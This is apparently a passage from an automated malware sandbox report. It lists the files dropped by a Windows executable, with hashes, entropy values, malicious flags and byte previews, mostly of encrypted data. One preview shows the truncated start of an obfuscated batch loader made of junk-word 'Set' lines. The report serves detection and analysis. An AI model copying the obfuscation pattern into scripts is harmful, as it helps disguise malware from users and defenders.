.T..q..M\......[:......t...]....Dl...;H...............F.k.c>.q..[.......I@S..ZT=`Y.+..L..co........}.+...t.O...{.C.....(l......7{r.>..dLk.-%.......l+........{.6%.G$.C[-(..E.cG..G5.{!...s."....>.iAS.?a.Xa.P..C.O.q...[.k.s.Q...zX...uZ
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):64512
              Entropy (8bit):7.996864555833121
              Encrypted:true
              SSDEEP:1536:FN40dPcmfNu5w3G5GPWVc+hpxJ3TbY/8FwGbCdZLC5g9MsS:sMd3RWa+/xxYewGbCdZLC68
              MD5:5C33E99D47CCEF024F335D3E3E2CB22C
              SHA1:142A30A52EEE8F085B973711EE73A967506384B7
              SHA-256:0E1BE2B56B96B24806828BD7581AC69E5E23BF967C86EA5FF863A6F93BE2C147
              SHA-512:17825EEC669A1857B883AD59E4F26B6D915FD859A9E16F6DF95E808990C1E977ED5A4B2B1551B7F7FEF07B3B7DAE5F0C30EB21357EA77EEB3814CC4B936CA8F6
              Malicious:true
              Preview:R...d.8......N.J..H. %J.K..C.w.^U.?O~M\......eh.i..p...5..mN....f..E.~..\ R..).hM.G...H.]....OSw@.L.....-i4vYz#...{KK.[....N.%za.....'`....ka...V.7.=?...f.[g%.Z. ..~...=/.6....+s:....e...BA.?.QnJ..O.....z.....v.g....7{G^`*.?.MM...G..#..F...nL....m....P.(J....|.i&O..i..,F:d..L....k.W.......?.#..........W.v.U '...Y...L.^..m....OI........ N..w,.4.]..af.j5...3...n^...x..|.*...\.%.$.0..H2..s....%QI4=.z.X.....Q......0A..{_F..&.......... ..(....3Q.U(.l.c...%..........Y....$M...Q..~.l'`....P.....|.*`..]Y;......o$+vJZ.-.;.i..".......X.G.h..u....=...3C..V]..}..Y.......&..<.$u...3s.-.P.Y.JZ...O.a....C..@..#W.{s%#.._....e.mr.....v..g.=2..yNL$!..(3oR zX2.}.^...'\).ey..>U.RM.....H.}.....j..^..(......`.i....... k...*.*......C...<..qJ.L.P..}.O.n...Rd5PL.|..a*..HR)b."...8~Ib.....r..m.]%..]_)@..V.v.a.8|ovyl.L..E.[.....6"+..Y..#s^..2...%.(....~.&1. .[.`,8.U:.JWQ..dc.....I.B.&.|y..Z-.q`..v.d......+..&....(MA......~_E4...}[...DBge..U...N.R.Z.AF..~e......x
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):53248
              Entropy (8bit):7.996742427668302
              Encrypted:true
              SSDEEP:768:XfA7daIQ5y7k1J44wr2RXfynL2CDecNJT+Ov/+fzxikTfpLLH0x/MrMIulEH:XfidVey7v2X+HDZzX6xi+pL4/MAN6
              MD5:BFD7EBAF2943D11671CB50806174EEDE
              SHA1:5C824449E6974EAF71D8FB0F570D4CE76BA831DD
              SHA-256:7B5D942BF8203B8CF9DFA5523BD932E36C16F91DFAB306B118E7B1ACDE7883D6
              SHA-512:C65E7486F08C0977DE958704EE61016E91B5691D43BB49AE41203BF7ABE0878203FABA1650C67F8C8B0F6276E5042E5BE6C8030968B922BF1117862BE89A1D04
              Malicious:true
              Preview:qLAh&.Zx.rV.V....+fm<.b...{7\/t.}.H%.Mk.N.n.....;..5.f=....C..'L..S.3..@1?..E..>!..q.\(...N.. Q.q9.u.vl....../.g.q>....!..Z..x.G2..v..-.V.+"._/|..lBu.....i.#(..x.?..t..vx..$...~e<..)r...mZ{Hw.....5tT.W#%..Bq..F...mU./G..o...&BE*r%|Y[.S......@..1..'z....D..x)*.Y...8....Y.....U^.._.O...T..L..\@..sw.....#2..f.$..H..S.x...^. H..Z..p...$...*3.%4{'n.Z*..oE$5.6~\PE.\.A...Y.}.[.6.Q.i'.N{..M.,....ii...w.Ce......b..S....8u............_......x.....).[...I...u@l......j...q.U...L.fBqr."..?...c.w..5Z<...m(..yB..C%.3.]....1...@M|.d1C...(3.7p..kU..i.q..Gx..G.'.5x|..V.hAn..7t..."9.n....;.zM..zs.['..)..R...Ga.....]..b..b\......Y..a.R......{.i.....l..G.."...u..F.M.....F.9....{A...:b..c5..G.?RP..D.a..*f...........oMw.NFE..4sE.0.Jx)v.=.k&....p."<12.i.9j..jI;....X....T.......X~.&.d>.C>.m..Qq..E.7.....|..air...+..~h..#.JP..r..Z...n..w...v.@Z..^...*.L...U)W-.z..s...C..cgi+y...e...r.....hG../.Z6.I.Qya##m}..y..q..lQ....yl.3.L....g...._H...e.q.j.S..),o..o.Zy..BA[.'@..AP8+
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:ASCII text, with very long lines (841), with CRLF line terminators
              Category:dropped
              Size (bytes):8753
              Entropy (8bit):5.112168319183873
              Encrypted:false
              SSDEEP:192:/YjisELs0/sDOykocrtURbjM9hC4mJJSKz4wKL3RjtHH016:JsELRsfortQbjKhQJJDz6LBhHH0M
              MD5:679A660E6448E2D327012672F96E392B
              SHA1:D076AF425395161DAAC0093BD2AC3224BF2C0D2C
              SHA-256:F0C7D541CC3FAECBE583663B7F7EAE6379DF06024E1B7AD6E764A87446406469
              SHA-512:844CB059456118947493905C19730BD09C87AB038FA19012D6E34F942B9B472042E757DA05C5BC8A254E79F6C376CB267F0897300CB40AD0716BAFF7C759BFFB
              Malicious:false
              Preview:Set Pediatric=x..IwDisorder Lands Enzyme Dedicated Executed Cook ..ZBExperiences Ruling Org Bend ..itqJapanese ..xNConcepts Dell Noise Adverse Broadcasting Dat Days ..bfEjExposed Ozone Filters ..bwfNasty Knows Rural Imagination Length Chorus Bibliographic Nikon Mat ..Set Mapping=e..GetFTamil Emission ..ndLamps Flags Shelter Reviewing ..LuFIntegrate Repeat New Rental ..EFriTopic Repository Recipe ..LgCCreatures Mood Relationship Closest Introduce Doug Christ ..tKPuerto Systems Hp Upc ..gTbRt Mia Dover Curtis ..jcENBerlin Jokes Sole Wire Threesome Alabama Opponents Effective ..dEKelkoo Tip Points Hot Free ..QjkSomeone Css Washer Permitted Enrollment Likelihood Colombia Cyprus ..Set Summit=l..jFVTheorem Ls Tracker Susan Worry Musical Buys Rendering ..rzMileage Sustainable Turkish Salary Machine ..jHFDennis ..yyebAnytime ..fNIssn Vary Thinking Founded Define ..KnMove Understand War Nut Flu University Searches ..GzhgEdges Confidentiality Ridge Switzerland Ltd Pipes Realty Comes ..rPqxTcp Cn
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):90112
              Entropy (8bit):7.998191478530064
              Encrypted:true
              SSDEEP:1536:jh29EJjOlr8dAGFblNJ2stjBTF1C9pVH7KWJ1LM5Y4e4kwkq:NbsruAGVlNYsL7yVH7KOeu47kq
              MD5:E034B160F517322AA180947402FC4726
              SHA1:AE518CB0A0AFA46110075AE58160E2B724E62FA4
              SHA-256:9FF4BA69743EDF76E919C3F83B55A29522E18FEDDA36097B43514849A763131E
              SHA-512:311E1481C631067BBE8FF2C4A45E7D53524AFA087017944AAFE76DE9D32359437366ABBBAFA28579D3934A9474C1796991905F0DCBA61A1A5FFC45BF543F2DEC
              Malicious:true
              Preview:y.....b.....K.......B..G.V.ou1.x..Xz9......?..8D...miZ.....I..H..y..:.s..]...y.;D'R...........^_=.A.<..X...b..k.....e...V..s......(@q...F..='..H....n`.L/1..s..^.k.Z........7.... ......O..'....m...0........8&.....5GI..%....0.M..6Q,q.../a...&....xm.z[...:...r^`-.?...-..pUXtY.....B...n..|.....@Q...s..5|]..WO.~Fp2.-.v.....+.0..4l....l...Zcl.[......Bz.. $..*........S.5...0...f..V....q....8........p..A{p"G........4h....s )B..yW..G..i{.....j..S.BU..9..;_.;.U..D..9..$....d@.B..r..V.......0..Ey#s..B..s...3$-.i.%....B..y.;..|.......v.-......sb....hv\..T..J......j.75..\h.l...6...5.....h.(0..(...^..CY....j&..G.t....w..@A4*.s+.J^.. B..B.h....l+.9..Q&%.Z.::..?m.l;.}{.C'B;.o^.........q...T........A.}...*.5..:C..%.*/..^+[...~.`.....t.u2"[.F..1W...X....4..0.p.nk<...(>H..:Nz............s,]...@.P.DP5.......X...E.M...X.M.G.....N.6...hB.6......u.gZ.**..aF..].....%...8...Ep.....d...).........fU...>.[....Dh....<.},6A.,G...ck.J...b...r."....J....MT..G.}.N.c.k....
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):82944
              Entropy (8bit):7.998145994072074
              Encrypted:true
              SSDEEP:1536:kH5qHzoufO+9jRkMSJGDDKKngNHUmMnkaVlPecEb389z8oUFV0DyA:IqTnOtq0R+qcEDi6FiDyA
              MD5:1BD686B0C4FC105AF901F7EA5E20282D
              SHA1:2957B83F6AE3E59363EF1BA782CBA99BF350B6E8
              SHA-256:ECD01318315464EF01AA0E927F6881AF55B31FAF9AE1CD8B82FC76858B031550
              SHA-512:E80F741F27A1063691027951EB0842EB42C2250CC7EE34B81F2D9C5962FF2577B0AC431EA385CA068BE722F7B9F51EF0FA940E2D63F555616ADE28543813BC7E
              Malicious:true
              Preview:.{..{b.K....R.n}.-3z..U..*../..oW.A....}.F08.)......Y&..,..F..K'..1.....59...!.j..-r..X...#O.a..,.).9...A.m.`...y.=.@...+.n.9h.\..D48m.......tYg.]..7h[.>....k*..f[J.B.g...K..V...{.......`.'..~[....b..XL.s.*.".5.A...Km.d."......JB..0..:.x[lx....0i.`6....D.n...z.Y7\.../..o.:....m..;^.2...D$.Wk.......|......s.$\)..=...S..*6....Y...K~;.I.]..4mb.[.)...*..?...d...P.:T...X0...|.u...G.M....H......1....z..._.....K.&.{tec..T......q...p...U..R.<r/.q.y..I..O!.$....G.?.5p...t...z&..&.`.X.......d.V!..M..^.|.ug..............M...w.X..f........N..D....*NF\.e....w@..7U.o..w...1.l..N......wC6...<...qY.T.....@.2B..e. b..~L..U...M.[.*.4..XE..M....'.i..q.0.V.]..v...#\-y....0...d.I..e..'3..2.^...mA;)..[...\l.Q.tU.........#d..i...;=..Pn>.s..._...YI.t...1...v.5...-7....k.>*.^l....\.5..g)..%.l.].8bj..2.2..RG G.v...t.6...\...S.y.-..b.$<4..5..p$..C.q...N.......|.G.v.{..Z..z3.`8...h.....<...zj..\r.N/.!.d.7.(.LZ.....v...V.9.b'.:?QG+.:.^T<.cI..=...n.Q...q.....".&$...p...h.9
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):97280
              Entropy (8bit):7.997924552621187
              Encrypted:true
              SSDEEP:1536:gJFgEMm0Ubjn/z1I30j75KICcHd0CQNRCOWTBH/xNadV86kxOVu2C2krv:GqEJfKICudnQNVWtH/xS86kR/r
              MD5:B471AC38D30713C610628365D7A8F1DC
              SHA1:D6A6DF5D5E60968060D43B88BF054825B44B2E94
              SHA-256:45959E1300A85984E3C3D2F19EB4ABEFA4B48A3034B8E176B76F6F05E3F421F1
              SHA-512:0BDBF2FAEEA0DF07C3B9D02257152F888F8DD069D64C6CD214C27E95AEF75E8F86698A046211F8F2117A81E84D966D32B64B782897F07E28706F19DBCD1F0BBE
              Malicious:true
              Preview:^B..[.Pd..Vx.) %..y.8h.....p.D.YF.]....A`....c......5..i...Ug.`.F.. *u.\f........a..'4r..S........\(...!.l.C.X.9./..V<..^..'i...|..bv.pZ......K.i.G.f..HQ.W..h..9.S_3D"5..].#...4......8.9....!B.r.$>.......j...I...B^...q.F.d....[."..4..g.%..Q.q.0...DF.*R,!)B.p......\b..w..\.....4,.?..R.A...f..^~. .k....6.w......._'.\^|m......j..c.NS....)...SB...>..`p'..6,nDz. ...:.3...x........?.E.U......j...f=.....$..<....!.... ....:...N.b&...J.P...7.....<`.$1f..%..".9...;.-..*H9......J..:.@....VW=%...C.....,.........4.X....X..0e....,.:...Q..wg;iP.........',...o>u...Z...F.......0u....B.mK.wu...k?R..NCF..T....e.>|...f.`u3.[QO..m.?c....M{..l..k...,.5FO.oL].M.....8...quj.?{K..B..h.M.M......Xw...t...P.9.......u.J...3.....;..?.A..:..F4q..v..x... .<1A..L.../.k...*T...........Y..=. ...e.../~GL..=p.(..E.....X.n.b%.6...j..S.?....h@..k.S..,H.lw~.w.t.py..X.f.6.iIG.9..2......T.;.KP.s{.gP...m,.."._...19.c.BF..<O...ibO..9R....lg(...I.s...e.....e..X.,/K....rD..:..mZ.T.
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):58368
              Entropy (8bit):7.996484306271761
              Encrypted:true
              SSDEEP:768:T/m82fcSbLTLihpebepRuGuKj+3ZSf3dM/uKM427lSnOCAdX6yRPOw07lIuFR6I9:T/IcILikepdj+3EtRKMLS1AdrRmbSuFB
              MD5:47C9EC7B6C30900125F9C283F239C5E5
              SHA1:BA10185B95B1AE93F054FFFEDD5FD4762512534C
              SHA-256:733895E0B9A8C5EEF309A3AD93D32BF5A84A9DD8EF07723A3EC6A017A82CF92F
              SHA-512:0BE3F07B210994D83918AF26ADBF964261DFF1E5DFD5F94116D4772E1BC4F1E7CAAD125C2D1F4E3D66D6DDC4438AAC4F69ED6CE355746B41E4978E88A9F20977
              Malicious:true
              Preview:...8...%...7..q.M..J.....J.+X.....).....5..k...RO..+..r...P........u....7....U..1..iJ..h/...r........)..-.2KD.V..Y.%...^g.:.d.I.3>..8.S..b.p....s..<-.d@M.J..#.R...[N..[..Q[....</ ...H.....`2..z.l.dM....eW.......).n{.`....r+..,+Lf...W..F`.x.80....+..p..5..y.@.Z...R...V..T.M....[.x..s.P...F..6E.X.......$..."..r.@UP....)..l7........6...c.S........~.5...>.e..Xf<"T..m.......^%.B.O$...%u.r...E..8......=..jk.....#......Ms.9..w.X.;..N..=)..k<.^p..A.#?......y.....o}0..ks..j...T.....u.,.....P.-..jU_....(.A....'b..F.L...T`...9..w...-...4,.%L..$Cs,..E.E?+..[......Yul.;..T..Z&M......fZ..^]J.tR8Xx...+.2.b.r.g...@..Ca..E..^..+.e..*..HW(.....F.. }V. X..Z....el.z.p.>k...H.....P......5...i....*.8`..|.u.<..t.....y..e.r.......2....0$E....B..k@..,..TC..........%%.[.st.vm.7M..>......].8X....>..kva..fzK...#.BB-Sgm....\...,.B.z..7.....a.....kdE...KG.+.....;....G...yw...c.."Q;.......mX+~...)..W.R.&]....h9 .U(...~O_a.j(..aH.b{<].Q.........kQ.k^..T.)..3.3.{\k..8v...
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):86016
              Entropy (8bit):7.997603696023
              Encrypted:true
              SSDEEP:1536:K0/ThZjQLQ1Qs7MF8uROvZvA7yuF/vIst8qtNZCaYN03WUxNADxoKnoF8MzZJ4:KwhZjX7MpqhYyDWZCvNKdxNdKnxMzY
              MD5:38ECD691B129D30468C631716125D34B
              SHA1:84AF6131F0B352A18EB002A5D5794EEF84B24EF7
              SHA-256:A9C3B215805DB8032279F61713F96A78D20C68ABFA7EEBC3F655E7133727CB58
              SHA-512:72618DFCDA4F1112BF5318CEC8433AB2B547F6B3BDD7ACED98F3B14E1573E7FAC56ACB6D3A05FF6863AD90C54FF5D71C0C52DA0961EF9B0A9CC3FB4F3F4892F8
              Malicious:true
              Preview:........,..S.m*HB.......d..5... .....+6....q_D...xI..-+..<..Bn.....({.1Q,.O....>...h'Q...h.. L.r.c.'....{....&f..)...W&.:...2.)Z.P.5.O.....g.&.L.f.y..S V_.)";,*`...D.-.2qW....^.."R.H..S..B.p.z~.m.......:.V.....i..!)|.T..y..E.K. ..../.,..'..t......... 0...a....p....1.........vb..2........e.F.0M..../.M.....<..D.."2<]IQ:............y;C.. n..].y.6..}.m..) sX.=S.]..Z.{...20....w..m.1y.[XA.?. .U&........wk...C_.y.1w@.5..O..N..2..p..U..W...)....F.^.Kc...=..>>.M..i..g0......XtS.2f.......c2...<..W....L#)<.P..G>.....Q....&...-..J..g|,.E"...em.kJ<..e.._&..^.....7-t..%9.p`.S.~.17O.mE..(.Z...D.eB'..Q'..?...o.h../L..V..,|.,mv.q.n...=..?.[.~..E[@.....n...Q9..g...|>6].(....ce7.*..e.v.Y.Y.gSBF7...M. -O/.9.,.d.b...R"*..G.W4.A.......\......f1F.x{>.5#x...hh...v...E1....Wf...0.^u.. o.......M.K..,V......^.....HJ:.l.e....d......Gc.p.....X'.....Q3Y..^..P.Jh,..b..C..`.Y.....nc7.).#..\..."vC.R.[..P..B.H..2;.O....J..Lz.B~...V]. zc.0.(.%.5.j.b..R.=Ah@..]q........*
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):91136
              Entropy (8bit):7.997803378365791
              Encrypted:true
              SSDEEP:1536:J4cLv9ntPylKNgFxAVfHYt3kLZfY2xRbjvY6bO1qaO0ILtUXklpk:J3htPFNgP4vOkLZfzbjxbEqaO0cttk
              MD5:9BE20FC94B698A9D972B14E5B37768B2
              SHA1:6FD4A8ECE9DFDA0BF1FA7F047BCDF986CA9FA74F
              SHA-256:9EC99DA4B772F610461C6F673EDA2BB7FCE625582C1B1C0D12ABA710CBFBA109
              SHA-512:03B3C24E4ECDDDE971F8784D1FF0785C7566CB94AC6B4E3E0506C45093EAD87B3DF3781B39466BA81FC488042F8E8DB6D8074C2122D2F60ABB2DDC3069ADA9AB
              Malicious:true
              Preview:h...R.ZaB}O.H..1..$.....".-.Lr.U...n..t=.I.@C.....%.w...,.i@.x.U...^4~..@.HNN.}._9.%.\.v$..~...$..Q.......U...E.\_....N.!....(.v....:..q...FH...tX.`[ ....(."m.<....s@.?7..Rr.Gd5..0...Fq.....>..>yP.?..ox...^.,.l...._.H~.....&?.w%reJ:.R%..$[Q..E...s...?._...n.....;v..........+8tO.R.l.....^/...1.)..K...<.i.]:|l..+.nx;\..f3.&..\.E...k.i,.5o. .#A2..YQ.....z._..S2*{....<.w0...i# ..&....I..J.....`.(...?6"8.X0|.....l'.X..._*@.....s.~#....D..KW...Gn...OP3a_.|...........WF.S{.....R.......a......v......u.h....PH*.T....0..:...P.!....X.....ogWY1e....B'..Gm...G.y...q(...T....5C...0Z..P7.MW.kdC..B7F!.f.......0...B...do.Z...k.=i.>.....5...>..).l..IOV....-R'r%N.M?......V.....e.5...T..iC...b....E.d...A..w.h...z.@....x.....\...O.l+..L.......7MF.5.A6`k..DWZ...:.&...........W..Tj...RKXG....)..$...54..Uh.l9.......yy..q.v.....^.?....Z.N..}7.L.....t!&.\V.{....U.Bc.........gU.m!.j..........(..i!.f...0...[$-,..1jz..~..sf.`c9./u..PhW....U..ay...n4.ZY....p...
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:PGP Secret Sub-key -
              Category:modified
              Size (bytes):65536
              Entropy (8bit):7.997308622711261
              Encrypted:true
              SSDEEP:1536:tSgycqJS85WzbTqwbocHaqefQ9MroNjQE+QdOTKzsZReX:tSgycqIAWzbPocHqAQOcReX
              MD5:BD753E623939A3F022BB8D1ACDC2BE35
              SHA1:089C637ACE82140B60043B21489399A4A3478151
              SHA-256:70FDD7CADCD45A80247897EA762BF3A63EDAFAB81D519FFFD2D2830729423FA2
              SHA-512:52EF1993FA316D5C57564E26B3B49EF70AADA9ACB0B29A383096370ACBD6E3C809DB42329D9C47CB271EFFBE49B25D49895E712696324EDDD724E898EF2FEA47
              Malicious:true
              Preview:..,q.W%...P..U.n.[.:.."b..O..l.^..b.xX9}dx.)...Mt$.........2....p1.].....[V..J.i:5].f.Z.X.~0.q.#...F...P+.........~..O......#..6..yN.n..$.,{.1.pR.c.Kw...*.k[..&...>. K<.q...Jn...f...ww.....S.nR..C..2.j.t|.....~.N..ScV..%q]3...3..eG....q.;.j.U..,.T.^.k.Ka...P..b..2.c....y..{.N....0q.._...V.._b.S......[{.....,..pd..0.C...sY.......p.).f.....Y.)...E..S.l.O{.9i{...SaQ...J../..!.....l.P...y..P.=k....|6..f>......FG.X...5......Y.....Z...j..+........P.m.'....%.........U'.a..........E.Dp....E?b... ..2.Ijn.U.......!h..awT.......U.....o.-_.....s@/..b..p....}.!.o...2.f.'/.q..?l...V.k.y.....U.nf.d#M`... .c...a...+.......}.d-..\..u3.m.+..h.....Q.........(x5.dQ9...|...7..j.#.O........m.g....S.k...~cn..g.&K6.7k.oO..\V#"0%$!..'..V..{,E..7............0..u...p.b...Q..,T!......X....=%!a.x.......Vy....(....../.Vu...........;a.!0.G.dR.Y..X.,.i.l.X.7.......>......o......3.&.j....Z.?...).u:.G7.U..uk...O.....J.m....m.g..M.uNt.6D....C;u.m.F..D/`.....,K..
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):81920
              Entropy (8bit):7.998052014024552
              Encrypted:true
              SSDEEP:1536:ggoTUqD3DIta9FXbWGAAXfhrGMY7j5q0v0DW52Tgj2u7lqdV7:ggEUqnItaF6GAAvhrfYxh8q528j2u7kL
              MD5:2B69517D24E1AE9B93162E70DB28BA34
              SHA1:11A60A4350EC3C7857800E245F1FF4100721C971
              SHA-256:01FC4E2A4A2706772EB50215D67724438B1B9C81CBB944CA592A3CB073516735
              SHA-512:588DA1676170F9BFEC7FF5422A68FF02C0F4D2FF0E5116C8354ED871265FC0DD1D3284DED30EA8283A57B3E0A6929DFBE6FCB6451A0E579BE378059AED7DACC5
              Malicious:true
              Preview:....T.!AT.C...b#..p..fS...y.>.2N.<..H...3.0S.d.....%Iw...fA.!,XvD.4.s0..L.]-7..J.f.F.\......3.]b\.j.m.q5.d...aZ.O...$H..)...Dq.&..;.._s...z.p.....EX...Qz..J........4....`}..+..E......9.k.q.(Q.zA.....N.U.b......J....".*.;..n.Y.,.M..(^...|..sEA(g.I>._..LGw.p....]y./.T.f."z$^.......U....f..R;...K.1.c.)...O.cdF....n..o.xU.....N#Fu..X+G.....J......bi..y.gI|..nQ2h&...T.....Q.#.v.gWHj.1...'s.a.c.t.w`..%u.H.......T........G.....ed....K...`.....w..0..`...l.P...+..G.).n^.A.q.....F.....*9..g..>......=k.W......=^..O.....^.q...[.q.u...S.'9$...0@..{;/".4I.Yq.].s.?x.XI..x.Kp.......k.l.z..)I..].'..6cq._..1.x.-..,].!..?Z..=@......?..E.T....nj.+?.<......#..^D.....j.....L.`@..^.....M..C/..s....A..I.On...... ....?.a+.0...J.p..49.....^V....|.9ZI........<...v....R.....d.a..bm.J.o.B...|....Y..s\.T....E#...q..(Zxm.}..`0.1.,.9...}.?...d]W...]....2^a...<.....,..o......h.s.....:v.e....Ow\....^..&..2j9#..w.......WrwlP.(!.EDQqa(@F.....d8...cc......R.g....8EE.l<.X
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):41532
              Entropy (8bit):7.995910903907069
              Encrypted:true
              SSDEEP:768:pd7ys6Lz6b6ThODbaGIQnwS2OqjU44Izt1pIPufUQ1E4vtDtrO0Y4zuHZQBt/:posG6GEuGIQwOEhzt1a2e0ZtK465QBZ
              MD5:3FB6C85BA8FED7019CF83091499DE1C0
              SHA1:832DE29E8D56CE6F2E0E42733F6E62DFD5BB4FDC
              SHA-256:9C87FB38CCE451D80110F3FD76A212FD9C5547686BE7EB0AB81B90F2090017D8
              SHA-512:18EA2A597791555FDC2495AA25D07B969F6D31B8AEFCFEA694EFCA13B2585488CD4BEC10D0591E3AC5088C781B9DB945E0D512FEBCAF778664446EC7FD282702
              Malicious:true
              Preview:...?....n..y'...]M.^>m...L.Vb...Q....O...;..M.<.xod5....d...._L..3..zV...H..u.Q...J.Ub...gy*..E..7p.\.;t.;3d..~H...Q.....f........P.3.>..M.L^.y.E...7..]_B........[Z.Lz..E..L.2#S...I..?.T-7--8.q..<{.5k.5@..g....5..Bjd. ..5.........E.n......z`.z...2r<zAg.lE..k...t...X....-.{..]....P.QFw..I+...N..@.GJ...c..........?).dfL.z..p.O.Y.s1.R..8.B.,..'VfI}~xD%T.Jq....!5w../.K..V..D..............,.2.P.&.{op(.K..|.....q..b. ..i.4.!s...(...r..yF...<...(x..D.\...p;.%7.".%$g.{..(...C...!r.2.Q.......&...l.drK.... ..z5.....r..[G8..M]0"..|0.`...=".U....85..J......O..R.S-......... .3k.C..P.)....C2...k..^.h...J......A.}V...0.+.......o........... .......H.....'..G.<.....,1E.....O'uA.5U.._..l. |1?C...}.t.i...#..^.6..}....j rM.#...y..f.GN(....[......]!.l.4...}.....?.3....S}..@.h%....d%&....x..;O.$zH.T.3V.o........[..7!)9......Bc. dc..i:..D..+.u...g...h.Z.)$9~C......p..`........k.....g.....H".@...P..u.^N.3..z.{..kx.p>.....sn....]..Z...D4....JL.v...|..r@a..
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:OpenPGP Public Key
              Category:dropped
              Size (bytes):98304
              Entropy (8bit):7.998139758861357
              Encrypted:true
              SSDEEP:1536:L998g9VFRGNmEjQxZk3DR1QGafNJYVm/zqn0YmfwCsbZAxcVzRcB0m0PfYr5ddTt:L7FRG+fooGuNJJzE01PsbZIcV/DPfyLP
              MD5:8F97CA1B16EFC43ADC9B72C20A2B3393
              SHA1:954F461D873F95FF4F11F6A9E29905C456E606E8
              SHA-256:E3934941A6269308B585663DEFCFADFC8113D9B540E9ED18710E675DF4E5CFCB
              SHA-512:3FF407FE0277D2AF40FD990D0122DF657E2B8EE481F53B5AD17A58871C5AA75C5D5F4356AC87D7182E04C10AD23E16C78A68D143D31EA6E11E2E0427EC733AE2
              Malicious:true
              Preview:.s."......R..B5.^......T..A2H9.G......._pqa........|.....Y.+..F....F..k..C.d.. ...].L.b..iO....G.u.w......s...h?......k.s.......4....n....x...!......R...).I....uo..R..`...s4.iQ.\j@a...R..j....&..^....q...7....s.=|7:g.>W...\.]....k.w$N..'...7$B...9=.?..u...3.F.zaS....g.3.=..2........._.Cm=...}.....?.PbW...G(..D...R..<....,..&.u\..Y$.....Rbl.........J#j....)...F].d..7L.r..u,.g.v...K.=_J...DZ.g....".(J.J.?.|.;.iSdk.P.f.mI...V.5}..q.;:.B\p?..^.....^....y......L..>C7...].3..T'\..6.4....K,...#3..y..Qld.......#..A]...v..h"..$...ST...xW..Jo....Bv..9X.HA....L..@.c.O.f7P..=5.|.5q..X.%zU...h.W...A..N.O..s.(Z .Z0..:....:..i.!.......0,..p3.:.[......3[....(+...3m.Gca~.u..#,A..@.~......._.Q......x...j!...&4~Y5..U...=g%B"qs.Ah<..I:?.I.P...x..:..J)..l...e.C..8t.p....^.RK5..(7.~.Ai.\+....z.QR.w..p..*...g...R....S<.../n...m.~9../W..xqi*.\.~.......M\\%-N..........\...].W.W}.>.^..8z...mA@..m.=S$D....M.......nEHi.~C.....E.2.....y...f.. ^{d.........u....>..
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):7.997048256672015
              Encrypted:true
              SSDEEP:1536:LHsExnB7zCewI0w3YSEH1c8FUIcTAVNUL9ZwQwmKicKugh:rvb7zCew1w3jhyz3vQkch
              MD5:D1CE1088B631506B85154BEE580CE826
              SHA1:C484BFA00D4CBF47A8AE382B03FE58014E7C2662
              SHA-256:39DBE3F38F3EF0A96CFB2D812ECE4B575D4C3FAF1A74C4C703A73440FB7EC527
              SHA-512:C011DD6B51D5F7F255AC29C9C9E77E4A93659B03CBC1037BF4B08EE36A6D685B7E0C4493538EA934E5F8D7078C7BC11D49FA3B2740FC88F88FBBB250B7699AB6
              Malicious:true
              Preview:P_W;.RE>....O?.D7.Fi.s.~..T=q!g....uP..<.9..u...W3\h.^?..@...g...U#.x<3.....K..g.9.%.`._........U...re-..`A1t)...B].n..+.n"[.f..V...tD...O....y.9...h..<..T...*b'I}...n...:.`.w...;.n..J......h=......].A.<.....)...h.9.d.V6.......P]^<...e...$.G...)f...j., .`...y1*L....j.^..I......M.A..T.o..!.'..+=..>...x..>.j.r.L.3.....&.1wr..1.......*o}.\.l.R..f.b.....90;G.......2%../.W.h6u.....j7N...kr......d.=......M...j+..`.d..E....$.\.Dxj..Qe..}...f%.'.u.my.P.sQ....R;N_....Q..(sU..V....m=v...p%>^....<*.}..('...%..b../>,...q.....z.;Z.pL.tN..j|i....K....T.........}..A... B.......0..d.8.4.......Q.f./.]...... ...!YYW:R.c.... W.....o...6!D..Q...p{.e...*.AAu..F..,ehB^p...'.6..s..M6F.S$.Kj #8$1..Zz=u..3.:PZ\......9..=..5.&.J.[*X...s....EQ.#b.{N3....#............o..n.v..O.1..+.3.h6\n.13..%K..u..jh...B\.$88..../...3.|C-k5.5....A.a7R.;.....hz.^.mt/...~} U...+...6.}.......gX".lV..$..K..!T........k$.It@0FNW. $..O.A....!.nW.D..!..oV.&...[\.....`..~}.Vh....X.+[......j..o.:
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):68608
              Entropy (8bit):7.997505856791043
              Encrypted:true
              SSDEEP:1536:EYwSnInSsSRui7gdt4u+sh5SZByP2rfLvyUHZQefoZEUljRQHugHThpm:EYznISsQui7gkn0+ByPYfLvyeJ+EWjRP
              MD5:80006C08DF1D8C82142E12DC2BB6E5F5
              SHA1:6E7D86BE0DCE7B9E27B439849AF77B581CA209F3
              SHA-256:38B182E33A88B93FB2F698E5E89CDB505348F499D45B90AB1BB015ACF99BE817
              SHA-512:D8C087CACA232A732425B34C3CE7BA149A1E7C59374847C4DA732A932FFD1D2646CC4593A8D406104F7FA6AB04B7FFD4C388B410E70B2D73D47B97E8490F3212
              Malicious:true
